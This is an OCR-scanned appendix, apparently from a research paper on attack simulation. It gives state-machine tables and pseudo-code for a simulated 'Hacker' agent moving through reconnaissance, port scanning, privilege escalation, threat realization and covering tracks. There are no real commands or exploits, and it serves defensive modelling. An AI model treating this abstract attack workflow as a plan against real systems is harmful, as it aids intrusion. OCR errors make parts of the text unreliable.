
0 

0 

0 

0 

15 

IS 

IO 

0 

0 

0 

0 

0 

0 

1 

1 

1 

1 

1 

1 

16 

IS 

End 

0 

0.3 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

17 

10 

R_I0_D  o 
R_I0_Entry 

IO 

0 

0 

0.7 

0 

0 

0 

0 

0 

0 

0 

0 

0 

18 

10 

Cl 

0 

0 

0 

0 

0 

0 

1 

1 

1 

1 

1 

1 

19 

IO 

End 

0 

0 

0.3 

0 

0 

0 

0 

0 

0 

0 

0 

0 

20 

Cl 

RE 

0 

0 

0 

0 

0 

0 

1 

1 

1 

1 

1 

1 

21 

RE 

R_RE_Do 

R_RE_Entry 

RE 

0 

0 

0 

0.7 

0 

0 

0 

0 

0 

0 

0 

0 

22 

RE 

UE 

0 

0 

0 

0 

0 

0 

1 

1 

1 

1 

1 

1 

23 

RE 

End 

0 

0 

0 

0.3 

0 

0 

0 

0 

0 

0 

0 

0 

24 

UE 

R_UE_Do 

R_UE_Entry 

UE 

0 

0 

0 

0 

0.7 

0 

0 

0 

0 

0 

0 

0 

25 

UE 

ABE 

0 

0 

0 

0 

0 

0 

1 

1 

1 

1 

1 

1 

26 

UE 

End 

0 

0 

0 

0 

0.3 

0 

0 

0 

0 

0 

0 

0 

27 

ABE 

R_ABE_Do 

R_ABE_Entry 

ABE 

0 

0 

0 

0 

0 

0.7 

0 

0 

0 

0 

0 

0 

28 

ABE 

End 

0 

0 

0 

0 

0 

0.3 

0 

0 

0 

0 

0 

0 

29 

ABE 

End 

0 

0 

0 

0 

0 

0 

1 

1 

1 

1 

1 

1 

5.  Transition  conditions.  Absent. 
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6.  Scripts. 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  R1  of  the  state  machine  R 


Entry 

Entry  action 

R_Rl_Entry 

Log.Create(); 

Log. A  =  "R";  Log.S  =  "Rl"; 

Log.Debuglnfo  =  "A  =>  R  =>  Rl"; 

Log.C  =  "Intermediate_State_Rl"; 

Log.Type  =  0; 

State  action 

Do  action 

R_Rl_Do 

Step.xState  =  "Rl"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "IH" 

IH 

Step.yState  =  "IS" 

IS 

Step.yState  =  "IO" 

IO 

RE 

Step.yState  =  "UE" 

UE 

Step.yState  =  "ABE" 

ABE 

Exit  action  | 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  IH  of  the  state  machine  R 


|  Entry  | 

Entry  action 

R_IH_Entry 

Log.Create(); 

Log.A  =  "R"; 

Log.S  =  "IH"; 

Log.Description  =  "Identification  of  Hosts"; 

Log.Debuglnfo  =  "A  =>  R  =>  IH"; 

Log.C  =  "  NonterminaI_State_4"; 

Log.Type  =  2; 

AUTO(  IH ); 

|  State  action  | 

Do  action 

R_IH_Do 

Step.xState  =  "IH"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "IH" 

IH 

Step.yState  =  "IS" 

IS 

Step.yState  =  "IO" 

IO 

Step.yState  =  "End" 

End 

Exit  action 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  IS  of  the  state  machine  R 


1  Entry  1 

Entry  action 

R_IS_Entry 

Log.Create(); 

Log.A  =  "R"; 

Log.S  =  "IS"; 

Log.Description  =  "Identification  of  Services"; 

Log.Debuglnfo  =  "A  =>  R  =>  IS"; 

Log.C  =  "  Nonterminal_State_6”; 

Log.Type  =  2; 

AUTO(  IS  ); 

|  State  action  | 

Do  action 

R_IS_Do 

Step.xState  =  "IS"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "IH" 

IH 

Step.yState  =  "IS" 

IS 

Step.yState  =  "IO" 

IO 

Step.yState  =  "End" 

End 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  10  of  the  state  machine  R 


Entry 

Entry  action 

Log.Create(); 

Log.A  =  "R"; 

R_IO_Entry 

Log.S  =  "10"; 

Log.Description  =  "Identification  of  Operating  system"; 

Log.Debuglnfo  =  "A  =>  R  =>  IO"; 

Log.C  =  "  Nonterminal_State_8"; 

Log.Type  =  2; 

AUTOC  IO  ); 

State  action 

Do  action 

Step.xState  =  "IO"; 

R_IS_Do 

Step. Condition  =  0; 

CALLSCRIPTt  Do_script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "IO" 


Step.yState  =  Cl 


Step.yState  =  "End" 


Exit  action 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  Cl  of  the  state  machine  R 


Entry 

Entry  action 

Log.Create(); 

Log.A  =  "R"; 

R_CI_Entry 

Log.S  =  "Cl"; 

Log.Description  =  "  Collecting  of  Additional  Information"; 

Log.Debuglnfo  =  "A  =>  R  =>  Cl"; 

Log.C  =  "  Nonterminal_State_9"; 

Log.Type  =  2; 

AUTO(  Cl ); 

State  action 

Do  action 

Step.xState  =  "Cl"; 

R_CI_Do 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "RE" 


Exit  action 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  RE  of  the  state  machine  R 


|  Entry  | 

Entry  action 

R_RE_Entry 

Log.CreateQ; 

Log.A  =  "R"; 

Log.S  =  "RE"; 

Log.Description  =  "Shared  Resource  Enumeration"; 

Log.Debuglnfo  =  "A  =>  R  =>  RE"; 

Log.C  =  "  Nonterminal_State_10"; 

Log.Type  =  2; 

AUTO(  RE  ); 

|  State  action  j 

Do  action 

R_RE_Do 

Step.xState  =  "RE"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "RE" 

RE 

Step.yState  =  "UE" 

UE 

Step.yState  =  "End" 

End 

|  Exit  action  |  j 
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Script  of  the  agent  “Hacker”  behaviour  in  the  state  UE  of  the  state  machine  R 


1  Entry  | 

Entry  action 

R_UE_Entry 

Log.Create(); 

Log.  A  =  "R"; 

Log.S  =  "UE"; 

Log.Description  =  "Users  and  groups  Enumeration"; 

Log.Debuglnfo  =  "A  =>  R  =>  UE"; 

Log.C  =  "Nonterminal_State_12"; 

Log.Type  =  2; 

AUTO(  UE  ); 

|  State  action  | 

Do  action 

R_UE_Do 

Step.xState  =  "UE"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "UE" 

UE 

Step.yState  =  "ABE" 

ABE 

Step.yState  =  "End" 

End 

|  Exit  action  |  | 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  ABE  of  the  state  machine  R 


1  Entry  | 

Entry  action 

R_ABE_Entry 

Log.Create(); 

Log.  A  =  "R"; 

Log.S  =  "UE"; 

Log.Description  =  "Applications  and  Banners  Enumeration"; 

Log.Debuglnfo  =  "A  =>  R  =>  ABE"; 

Log.C  =  "  Nonterminal_State_14"; 

Log.Type  =  2; 

AUTO(  ABE  ); 

|  State  action  | 

Do  action 

R_ABE_Do 

Step.xState  =  "ABE"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "UE" 

UE 

Step.yState  =  "ABE" 

ABE 

Step.yState  =  "End" 

End 

|  Exit  action  |  [ 
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III.  State  machine  I  (Implantation  and  threat  realization) 

1.  Identifier  of  the  node  to  which  the  state  machine  corresponds.  (1  2) 

2.  State  machine  diagram. 


3.  Main  parameters  of  the  state  machine. 


State  machine  name 

I 

Relevant  intentions 

1,2,3,4,5,6,7,8,9,10,11,12 

States 

11,  GAR,  EP,  GAD,  TR, 
CT,  CBD,  End 

First  State 

11 

Nonterminal  states 

GAR,  EP,  GAD,  TR,  CT, 
CBD 

Terminal  states 

- 

Auxiliary  states 

11 
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4.  Parameters  of  transitions. 


N 

CS 

Script  Name 

NS 

Cond 

Intentions 

i 

2 

3 

4 

5 

6 

1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

11 

12 

IH 

IS 

10 

RE 

UE 

ABE 

GAR 

EP 

CVR 

IVR 

AVR 

CBD 

Pi  /  jii 

0 

I 

11 

0 

0 

0 

0 

0 

0 

1 

1 

1 

1 

i 

1 

1 

11 

I_I l_Do 

GAR 

0 

0 

0 

0 

0 

0 

1 

1 

1 

1 

0 

1 

2 

11 

TR 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

1 

0 

3 

GAR 

try 

I_GAR_Do 

EP 

0 

0 

0 

0 

0 

0 

0 

0.7 

0.5 

0.5 

0 

0.4 

4 

GAR 

GAD 

0 

0 

0 

0 

0 

0 

0 

0 

0.2 

0.2 

0 

0.2 

5 

GAR 

TR 

0 

0 

0 

0 

0 

0 

0 

0 

0.3 

0.3 

0 

0 

6 

GAR 

CT 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0.2 

7 

GAR 

CBD 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0.2 

8 

GAR 

End 

0 

0 

0 

0 

0 

0 

1 

0.3 

0 

0 

0 

0 

9 

EP 

I_EP_Do 

GAD 

0 

0 

0 

0 

0 

0 

0 

0 

0.4 

0.4 

0 

0.4 

10 

EP 

TR 

0 

0 

0 

0 

0 

0 

0 

0 

0.6 

0.6 

0 

0 

11 

EP 

CT 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0.2 

12 

EP 

CBD 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0.4 

13 

EP 

End 

0 

0 

0 

0 

0 

0 

0 

1 

0 

0 

0 

0 

14 

GAD 

I_GAD_Do 

TR 

0 

0 

0 

0 

0 

0 

0 

0 

1 

1 

0 

0 

15 

GAD 

CT 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0.6 

16 

GAD 

CBD 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0 

0.4 

17 

TR 

I_TR_Do 

CT 

0 

0 

0 

0 

0 

0 

0 

0 

0.2 

0.2 

0 

0 

18 

TR 

CBD 

0 

0 

0 

0 

0 

0 

0 

0 

0.4 

0.4 

0 

0 

19 

TR 

End 

0 

0 

0 

0 

0 

0 

0 

0 

0.4 

0.4 

1 

0 

20 

CT 

I_CT_Do 

CBD 

0 

0 

0 

0 

0 

0 

0 

0 

0.4 

0.4 

0 

1 

21 

CT 

End 

0 

0 

0 

0 

0 

0 

0 

0 

0.6 

0.6 

0 

0 

22 

CT 

End 

1 

0 

0 

0 

0 

0 

0 

0 

0 

1 

1 

0 

1 

23 

CBD 

I_CBD_Do 

CT 

0 

0 

0 

0 

0 

0 

0 

0 

0.6 

0.6 

0 

0.6 

24 

CBD 

End 

0 

0 

0 

0 

0 

0 

0 

0 

0.4 

0.4 

0 

0.4 

25 

CBD 

End 

2 

0 

0 

0 

0 

0 

0 

0 

0 

1 

1 

0 

1 

5.  Transition  conditions. 


Cond  =  1 :  Step.PrevState  =  “CBD” 
Cond  =  2  :  Step.PrevState  =  “CT” 

6.  Scripts. 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  II  of  the  state  machine  I 


Entry 

Entry  action 

I_Il_Entry 

Log.Create(); 

Log.  A  =  "I"; 

Log.S  =  "It"; 

Log.Debuglnfo  =  "A  =>  I  =>  11"; 

Log.C  =  "Intermediate_State_Il"; 

Log.Type  =  0; 

State  action 

Do  action 

I_Il_Do 

Step.xState  =  "11"; 

Step. Condition  =  0; 

Step.PrevState  =  "It"; 

CALLSCRIPT(  Do script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "GAR" 

GAR 

Step.yState  =  "TR" 

TR 

Exit  action  | 
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Script  of  the  agent  “Hacker”  behaviour  in  the  state  GAR  of  the  state  machine  I 


Entry 

Entry  action 

I_GAR_Entry 

Log.Create(); 

Log.  A  =  "I"; 

Log.S  =  "GAR”; 

Log. Description  =  "  Gating  Access  To  Resources"; 

Log.Debuglnfo  =  "A  =>  I  =>  GAR"; 

Log.C  =  "Nonterminal_State_16"; 

Log.Type  =  2; 

AUTO(  GAR  ); 

State  action 

Do  action 

I_GAR_Do 

Step.xState  =  "GAR"; 

Step. Condition  =  0; 

Step.PrevState  =  "GAR"; 

CALLSCRIPT(  Do_script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "EP" 

EP 

Step.yState  =  "GAD" 

GAD 

Step.yState  =  "TR" 

TR 

Step.yState  =  "CT" 

CT 

Step.yState  =  "CBD" 

CBD 

Step.yState  =  "End" 

End 

Exit  action 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  EP  of  the  state  machine  I 


Entry 

Entry  action 

I_EP_Entry 

Log.Create();  Log.A  =  "I"; 

Log.S  =  "EP"; 

Log.Description  =  "Escalating  Privilege"; 

Log.Debuglnfo  =  "A  =>  I  =>  EP"; 

Log.C  =  "Nonterminal_State_26"; 

Log.Type  =  2; 

AUTO(  EP  ); 

State  action 

Do  action 

I_EP_Do 

Step.xState  =  "EP"; 

Step. Condition  =  0; 

Step.PrevState  =  "EP"; 

CALLSCRIPT(  Do_script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "GAD" 

GAD 

Step.yState  =  "TR" 

TR 

Step.yState  =  "CT" 

CT 

Step.yState  =  "CBD" 

CBD 

Step.yState  =  "End" 

End 

Exit  action 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  GAD  of  the  state  machine  I 


1  Entry  j 

Entry  action 

I_GAD_Entry 

Log.CreateQ;  Log.A  =  "I";  Log.S  =  "GAD"; 

Log.Description  =  "Gaining  Additional  Data"; 

Log.Debuglnfo  =  "A  =>  I  =>  GAD"; 

Log.C  =  "Nonterminal_State_27";  Log.Type  =  2;  AUTO(  GAD  ); 

|  State  action  j 

Do  action 

I_GAD_Do 

Step.xState  =  "GAD";  Step. Condition  =  0; 

Step.PrevState  =  "GAD"; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "TR" 

TR 

Step.yState  =  "CT" 

CT 

Step.yState  =  "CBD" 

CBD 

Exit  action 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  TR  of  the  state  machine  I 


1  Entry  | 

Entry  action 

I_TR_Entry 

Log.Create(); 

Log.  A  =  "I"; 

Log.S  =  "TR"; 

Log. Description  =  'Threat  Realization"; 

Log.Debuglnfo  =  "A  =>  I  =>  TR"; 

Log.C  =  "Nonterminal_State_28"; 

Log.Type  =  2; 

AUTO(  TR  ); 

|  State  action  | 

Do  action 

I_TR_Do 

Step.xState  =  "TR"; 

Step. Condition  =  0; 

Step.PrevState  =  "TR"; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "CT" 

CT 

Step.yState  =  "CBD" 

CBD 

Step.yState  =  "End" 

End 

|  Exit  action  |  j 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  CT  of  the  state  machine  I 


1  Entry  | 

Entry  action 

I_CT_Entry 

Log.Create(); 

Log.  A  =  "I"; 

Log.S  =  "CT"; 

Log.Description  =  "Covering  Tracks"; 

Log.Debuglnfo  =  "A  =>  I  =>  CT"; 

Log.C  =  "Nonterminal_State_32"; 

Log.Type  =  2; 

AUTO(  CT  ); 

|  State  action  | 

Do  action 

I_CT_Do 

Step.xState  =  "CT"; 

Step. Condition  =  0; 

IF  (Step.PrevState  =  "CBD")  THEN  Step.Condition  =  1;  ENDIF; 

Step.PrevState  =  "CT"; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "CBD" 

CBD 

Step.yState  =  "End" 

End 

Exit  action 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  CBD  of  the  state  machine  I 


|  Entry  ] 

Entry  action 

I_CBD_Entry 

Log.Create();  Log.A  =  "I";  Log.S  =  "CBD"; 

Log.Description  =  "Covering  Tracks"; 

Log.Debuglnfo  =  "A  =>I=>CBD"; 

Log.C  =  "Nonterminal_State_32"; 

Log.Type  =  2; 

AUTO(  CBD  ); 

|  State  action  | 

Do  action 

I_CBD_Do 

Step.xState  =  "CBD"; 

Step.Condition  =  0; 

IF  (Step.PrevState  =  "CT")  THEN  Step.Condition  =  1;  ENDIF; 

Step.PrevState  =  "CBD"; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "CT" 

CT 

Step.yState  =  "End" 

End 

Exit  action 


IV.  State  machine  IH  (Identification  of  Hosts) 

1.  Identifier  of  the  node  to  which  the  state  machine  corresponds.  (1 1 1) 


2.  State  machine  diagram. 

r 


3.  Main  parameters  of  the  state  machine. 


State  machine  name 

IH 

Relevant  intentions 

1,2,3,4,5,6,7,8,9,10,11,12 

States 

mi,  DC,  SPIH,  IH2,  End 

First  State 

IH1 

Nonterminal  states 

SPIH 

Terminal  states 

DC 

Auxiliary  states 

mi,  IH2 

4.  Parameters  of  transitions. 


N 

CS 

Script  Name 

NS 

Cond 

Intentions 

i 

2 

3 

4 

5 

6 

1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

11 

12 

IH 

IS 

IO 

RE 

UE 

ABE 

GAR 

EP 

CVR 

IVR 

AYR 

CBD 

Pi  / 

0 

IH 

IHl 

1 

0 

0 

0 

0 

0 

1 

i 

i 

i 

i 

1 

1 

IHl 

IH_IHl_En1 

IH_IHl_Do 

DC 

0.5 

0 

0 

0 

0 

0 

0.5 

0.5 

0.5 

0.5 

0.5 

0.5 

2 

IHl 

SPIH 

0.5 

0 

0 

0 

0 

0 

0.5 

0.5 

0.5 

0.5 

0.5 

0.5 

3 

DC 

IH_DC_Do 

DC 

0.3 

0 

0 

0 

0 

0 

0.3 

0.3 

0.3 

0.3 

0.3 

0.3 

4 

DC 

IH2 

0.7 

0 

0 

0 

0 

0 

0.7 

0.7 

0.7 

0.7 

0.7 

0.7 

5 

SPIH 

IH_SPIH_Do 

SPIH 

0.3 

0 

0 

0 

0 

0 

0.3 

0.3 

0.3 

0.3 

0.3 

0.3 

1 

1 

6 

SPIH 

IH2 

0.7 

0 

0 

0 

0 

0 

0.7 

0.7 

0.7 

0.7 

0.7 

0.7 

7 

IH2 

IH_IH2_En1 

IH_IH2_Do 

IHl 

0.5 

0 

0 

0 

0 

0 

0.5 

0.5 

0.5 

0.5 

0.5 

0.5 

8 

IH2 

End 

0.5 

0 

0 

0 

0 

0 

0.3 

0.3 

0.3 

0.3 

0.3 

0.3 

5.  Transition  conditions.  Absent. 

6.  Scripts. 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  IH1  of  the  state  machine  IH 


Entry 

Entry  action 

IH_IHl_Entry 

Log.Create(); 

Log.A  =  "IH";  Log.S  =  "IHl"; 

Log.Debuglnfo  =  "A  =>  R  =>  IH  =>  IHl"; 

Log.C  =  "Intermediate_State_IHl"; 

Log.Type  =  0; 

State  action 

Do  action 

IH_IHl_Do 

Step.xState  =  "IHl"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "DC" 

DC 

Step.yState  =  "SPIH" 

SPIH 

Exit  action  | 
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Script  of  the  agent  “Hacker”  behaviour  in  the  state  DC  of  the  state  machine  IH 


1  Entry  | 

Entry  action 

IH_DC_Entry 

dC  =  0.6;  Log.Create();  Log.A  =  "IH";  Log.S  =  "DC"; 

Log.Description  =  "Network  Ping  Sweeps"; 

Log.Debuglnfo  =  "A  =>  R  =>  IH  =>  DC"; 

Log.ResultComment  =  "IP-addresses";  Log.C  =  "Terminal_State_l";  Log.Type  =  1; 

C ALLSCRIPT (  ip  address  ); 

|  State  action  | 

Do  action 

IH_DC_Do 

Step.xState  =  "DC"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "DC" 

DC 

Step.yState  =  "IH2" 

IH2 

|  Exit  action 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  SPIH  of  the  state  machine  IH 


|  Entry  j 

Entry  action 

IH_SPIH_Entry 

Log.Create();  Log.A  =  "IH";  Log.S  =  "SPIH";  Log.Description  =  "Port  Scanning"; 
Log.Debuglnfo  =  "A  =>  R  =>  IH  =>  SPIH";  Log.C  =  "Nonterminal  State  5"; 

Log.Type  =  2;  AUTOC  SPIH  ); 

|  State  action  | 

Do  action 

IH_SPIH_Do 

Step.xState  =  "SPIH";  Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  j 

Step.yState  =  "SPIH" 

SPIH 

Step.yState  =  "IH2" 

IH2 

|  Exit  action  |  | 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  IH2  of  the  state  machine  IH 


I  Entry  | 

Entry  action 

IH_IH2_Entry 

Log.Create();  Log.A  =  "IH";  Log.S  =  "IH2"; 

Log.Debuglnfo  =  "A  =>  R  =>IH=>IH2"; 

Log.C  =  "Intermediate_State_IH2";  Log.Type  =  0; 

|  State  action  | 

Do  action 

IH_IH2_Do 

Step.xState  =  "IH2"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "IHl" 

IHl 

Step.yState  =  "End" 

End 

Exit  action 


Common  script  for  all  terminal  states  of  the  state  machines  IH  and  SPIH 


1  Entry  | 

|  Entry  action 

|  State  action  | 

Do  action 

ip_address 

IF  (  xHost.Exist  (  xHost.IP  <> ""  ) )  THEN 

REPEAT 

AttRandom  (  dC,  bX  ); 

IF  ( bX  )  THEN 

IF  (  NOT  Host. Exist  (  Host.IP  =  xHost.IP  ) )  THEN 

Host. Created;  Host.IP  =  xHost.IP; 

ENDIF; 

LogResult.CreateO;  LogResult.ID  =  Log. ID;  LogResult.Result  =  Host.IP; 

ENDIF; 

UNTIL  (  xHost.NextO  ); 

ENDIF; 

|  Transitions.  Condition  /  Next  state  /  Action  j 

□ 

□ 

Exit  action 


V.  State  machine  SPIH  (Port  Scanning) 

1.  Identifier  of  the  node  to  which  the  state  machine  corresponds.  (1112) 


2.  State  machine  diagram. 

1 


3.  Main  parameters  of  the  state  machine. 


SPIH1 

/' 

'  \ 

SPIH  2 

, 

n 


State  machine  name 

SPIH 

Relevant  intentions 

1,2,3,4,5,6,7,8,9,10,11,12 

States 

SPIH1,  STIH,  SSIH, 
SPIH2,  End 

First  State 

SPIH1 

Nonterminal  states 

Terminal  states 

STIH,  SSIH 

Auxiliary  states 

SPIH1,  SPIH2 

4.  Parameters  of  transitions. 


N 

CS 

Script  Name 

NS 

Cond 

Intentions 

i 

2 

3 

4 

5 

6 

1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

11 

12 

IH 

IS 

IO 

RE 

UE 

ABE 

GAR 

EP 

CVR 

IVR 

AVR 

CBD 

Pi  /  IB 

0 

SPIH 

SPIHl 

1 

0 

0 

0 

0 

0 

1 

i 

1 

i 

i 

1 

1 

SPIHl 

SPIH  SPIHl  Do 

STIH 

0.5 

0 

0 

0 

0 

0 

0.5 

0.5 

0.5 

0.5 

0.5 

0.5 

2 

SPIHl 

SSIH 

0.5 

0 

0 

0 

0 

0 

0.5 

0.5 

0.5 

0.5 

0.5 

0.5 

3 

STIH 

iTIH_Entr; 

SP IH_STIH_Do 

STIH 

0.3 

0 

0 

0 

0 

0 

0.3 

0.3 

0.3 

0.3 

0.3 

0.3 

4 

STIH 

SPIH2 

0.7 

0 

0 

0 

0 

0 

0.7 

0.7 

0.7 

0.7 

0.7 

0.7 

5 

SSIH 

SPIH_SSIH_Do 

SSIH 

0.3 

0 

0 

0 

0 

0 

0.3 

0.3 

0.3 

0.3 

0.3 

0.3 

1 

6 

SSIH 

SPIH2 

0.7 

0 

0 

0 

0 

0 

0.7 

0.7 

0.7 

0.7 

0.7 

0.7 

7 

SPIH2 

SPIH_SPIH2_Do 

SPIHl 

0.5 

0 

0 

0 

0 

0 

0.5 

0.5 

0.5 

0.5 

0.5 

0.5 

8 

SPIH2 

End 

0.5 

0 

0 

0 

0 

0 

0.5 

0.5 

0.5 

0.5 

0.5 

0.5 

5.  Transition  conditions.  Absent. 


6.  Scripts. 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  SPIH1  of  the  state  machine  SPIH 


Entry 

Entry  action 

SPIH  SPIHl  Entry 

Log.Create(); 

Log.A  =  "SPIH"; 

Log.S  =  "SPIHl"; 

Log.Debuglnfo  =  "A  =>  R  =>  IH  =>  SPIH  =>  SPIHl"; 

Log.C  =  "Intermediate_State_SPIHl"; 

Log.Type  =  0; 

State  action 

Do  action 

SPIH  SPIHl  Do 

Step.xState=  "SPIHl"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "STIH" 

STIH 

Step.yState  =  "SSIH" 

SSIH 

Exit  action  | 
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Script  of  the  agent  “Hacker”  behaviour  in  the  state  STIH  of  the  state  machine  SPIH 


1  Entry  | 

Entry  action 

SPIH  STIH  Entry 

dC  =  0.9; 

Log.Create(); 

Log.A  =  "SPIH"; 

Log.S  =  "STIH"; 

Log.Description  =  "TCP  connect  scan"; 

Log.Debuglnfo  =  "A  =>  R  =>  IH  =>  SPIH  =>  STIH"; 

Log.ResultComment  =  "IP-addresses"; 

Log.C  =  "  Terminal_State_2"; 

Log.Type  =  1; 

C ALLSCRIPT ( ip_address  ); 

|  State  action  | 

Do  action 

SPIH  STIH  Do 

Step.xState  =  "STIH"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  j 

Step.yState  =  "STIH" 

STIH 

Step.yState  =  "SPIH2" 

SPIH2 

|  Exit  action 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  SSIH  of  the  state  machine  SPIH 


Entry 

Entry  action 

dC  =  0.9; 

SPI H  SSI H  Entry 

Log.Create(); 

Log.A  =  "SPIH"; 

Log.S  =  "SSIH"; 

Log.Description  =  "  TCP  SYN  scan  "; 

Log.Debuglnfo  =  "A  =>  R  =>  IH  =>  SPIH  =>  SSIH"; 

Log.ResultComment  =  "IP-addresses"; 

Log.C  =  "  Terminal_State_3"; 

Log.Type  =  1; 

C ALLSCRIPT ( ip_address  ); 

State  action 

Do  action 

Step.xState  =  "SSIH"; 

SPIH  SSIH  Do 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

Transitions.  Condition  /  Next  state  /  Action 

Step.yState  =  "SSIH" 


Step.yState  =  "SPIH2" 


Exit  action 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  SPIH2  of  the  state  machine  SPIH 


1  Entry  | 

Entry  action 

SPIH  SPIH2  Entry 

Log.Create(); 

Log.A  =  "SPIH"; 

Log.S  =  "SPIH2"; 

Log.Debuglnfo  =  "A  =>  R  =>  IH  =>  SPIH  =>  SPIH2"; 

Log.C  =  "Intermediate_State_SPIH2"; 

Log.Type  =  0; 

|  State  action  | 

Do  action 

SPIH  SPIH2.no 

Step.xState  =  "SPIH2"; 

Step. Condition  =  0; 

CALLSCRIPT(  Do_script ); 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Step.yState  =  "SPIH1" 

SPIH1 

Step.yState  =  "End" 

End 

|  Exit  action  |  | 
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VI.  Communicational  state  machine  IH_MSG 

1.  Identifier  of  the  node  to  which  the  state  machine  corresponds.  (1) 


2.  State  machine  diagram.  3.  Main  parameters  of  the  state  machine. 


State  machine  name 

IH MSG 

Relevant  intentions 

1,2,3,4,5,6,7,8,9,10,11,12 

States 

IH MSG Proc,  End 

First  State 

Init 

Nonterminal  states 

- 

Terminal  states 

- 

Auxiliaryi  Communicational ) 
states 

IH_MSG_Proc 

4.  Parameters  of  transitions. 


N 

cs 

Script  Name 

NS 

Cond 

Intentions 

i 

2 

3 

4 

5 

6 

1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

n 

12 

IH 

IS 

10 

RE 

UE 

ABE 

GAR 

EP 

CVR 

IVR 

AVR 

CBD 

pi  /  jgg 

0 

Init 

MSG_Init_Do 

IH_MSG_Proc 

1 

I  H_MS  G__P  roc 

IH  MSG  Proc  Do 

I H_MS G_P  roc 

2 

I H_MS G_P  roc 

End 

5.  Transition  conditions.  Absent. 


6.  Scripts. 

Script  of  the  agent  “Hacker”  behaviour  in  the  state  Init  of  the  state  machine  IHJVISG 


Entry 


Entry  action 


State  action 


Do  action 
MSG  Init  Proc 


MESSAGE  (Attack,  AttackTemplate,  ReplyWith="recon"); 


Transitions.  Condition  /  Next  state  /  Action 


IH_MSG_Proc 


Exit  action 


Script  of  the  agent  “Hacker”  behaviour  in  the  state  IH_MSG_Proc  of  the  state  machine  IH_MSG 


Entry 

Entry  action 

State  action 

Do  action 

Transitions.  Condition  /  Next  state  /  Action 

IF  ((  Dialog  !=  0  )  AND  NewMessageFind  ) 

IH_MSG_Proc 

IF  ((  Dialog  =  0  ) 

End 

Exit  action 

IH_MS  G_Proc_Do 

IF  (newAttack.Exist())  THEN 

REPEAT 

IF  (newAttack.ip!="")  THEN 

IF  (NOT  Host.Exist(Host.IP=newAttack.ip))  THEN 

Host.Create();  Host.IP=newAttack_ip; 

ENDIF; 

LogResult.CreateQ;  LogResult.ID=LogID;  LogResult.Result=Host.IP; 

ENDIF; 

UNTIL  (newAttack.Next()); 

ENDIF; 

LastMessage.CreateO;  LastMessage.Auto=IDAuto;  LastMessage.Msg=MSGNumber; 
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Appendix  2.  Examples  of  the  scripts  of  the  Network  Agent  operation 


Script  of  the  “Network  agent”  behaviour  in  the  state  Init  of  the  state  machine  N 

_ Entry _ 

